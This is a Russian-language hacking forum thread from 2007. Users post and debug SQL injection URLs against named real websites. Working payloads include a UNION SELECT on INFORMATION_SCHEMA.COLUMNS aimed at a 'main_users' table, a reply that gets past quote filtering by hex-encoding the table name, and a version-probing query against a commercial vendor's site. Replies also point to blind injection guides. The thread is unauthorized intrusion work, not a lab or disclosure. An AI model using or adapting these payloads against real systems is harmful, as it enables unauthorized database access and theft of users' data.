ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
27.08.2007, 22:05
|
|
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449
Репутация:
17
|
|
http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFROMATION_SCHEMA .COLUMNS+where+table_name=main_users+limit+1,1/*
почему??
SELECT command denied to user 'u23390'@'10.10.223.240' for table 'COLUMNS'
|
|
|
27.08.2007, 22:16
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Сообщение от noisia
http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFROMATION_SCHEMA .COLUMNS+where+table_name=main_users+limit+1,1/*
почему??
SELECT command denied to user 'u23390'@'10.10.223.240' for table 'COLUMNS'
1) Ты ошибся, смотри ты написал INF ROMATION_SCHEMA.COLUMNS, а надо INF ORMATION_SCHEMA.COLUMNS
2) Делать надо не так: table_name=main_users, а так: table_name='main_users', т.е. писать в кавычках.
3) Но здесь кавычки фильтруются, но это легко обойти, написав название таблицы в хексах: 0x6d61696e5f7573657273
В итоге должно выглядить так:
Код:
http://mir-tech.ru/group.php?cat=-5+union+select+column_name+from+INFORMATION_SCHEMA.COLUMNS+where+table_name=0x6d61696e5f7573657273+limit+0,1/*
P.S. Эта инъекция уже выкладывалась, юзай антибоян:
http://antiboyansql.narod.ru/sql.txt
Последний раз редактировалось Grey; 28.08.2007 в 00:27..
|
|
|
|
28.08.2007, 03:22
|
|
Познающий
Регистрация: 13.03.2007
Сообщений: 55
Провел на форуме:
297449
Репутация:
17
|
|
?id=2+union+select+table_name,2,3,4+from+INFORMATI ON_SCHEMA.TABLES/*
получаю
Query failed : SELECT command denied to user 'metropo3_donban'
helpppp
|
|
|
|
28.08.2007, 04:06
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Сообщение от noisia
?id=2+union+select+table_name,2,3,4+from+INFORMATI ON_SCHEMA.TABLES/*
получаю
Query failed : SELECT command denied to user 'metropo3_donban'
helpppp
Ну и че? чуть-чуть аглицкого заподло изучить?... не имеешь ты права такой запрос к БД использовать, отключена возможность, и такое бывает... а че ты хотел? (наверное бесплатный хостинг)
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 28.08.2007 в 04:09..
|
|
|
|
28.08.2007, 08:49
|
|
Познающий
Регистрация: 09.07.2007
Сообщений: 42
Провел на форуме:
88752
Репутация:
72
|
|
Как обычно тему удалили. Здорово вообще. Есть скуль на неро, вот линк http://www.nero.com/eng/showpress.php?id=-1+GROUP+BY+13/* юнион не пашет и пишет что ошибка в sql запросе хотя почему то group by нормально работает. Посмотрите скуль, скажите своё мнение.
|
|
|
|
28.08.2007, 09:34
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
Провел на форуме:
1212427
Репутация:
187
|
|
2 4nob1oz
Может быть версия скуля 3.x.x?
|
|
|
|
28.08.2007, 09:39
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346
Репутация:
1719
|
|
И правда, версия MySQL 3.*
Запрос, подтверждающий это:
Код:
http://www.nero.com/eng/showpress.php?id=100+and+substring(version(),1,1)=3
|
|
|
|
28.08.2007, 10:57
|
|
Познающий
Регистрация: 09.07.2007
Сообщений: 42
Провел на форуме:
88752
Репутация:
72
|
|
А как же тогда данные из базы выуживать без union, это же обьединение а если его нет то как достать данные то, таблиц то мы не знаем да и information_schema.tables тут и не пахнет конечно же. Я с мускулом 3 версии ниразу не работал. Как быть тогда?
|
|
|
|
28.08.2007, 11:17
|
|
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591
Репутация:
123
|
|
Ничего из него не вытащить, максимум можно узнать название базы данных, пользователя и ещё несколько системных переменных... К сржалению всё
|
|
|
|
28.08.2007, 11:23
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
это blind sql-inject
читай есть на форуме..
например тут
http://forum.antichat.ru/thread19844.html
http://forum.antichat.ru/showpost.php?p=407227&postcount=3
ну и конечно тут http://www.securitylab.ru/contest/212099.php?
Последний раз редактировалось halkfild; 28.08.2007 в 11:31..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
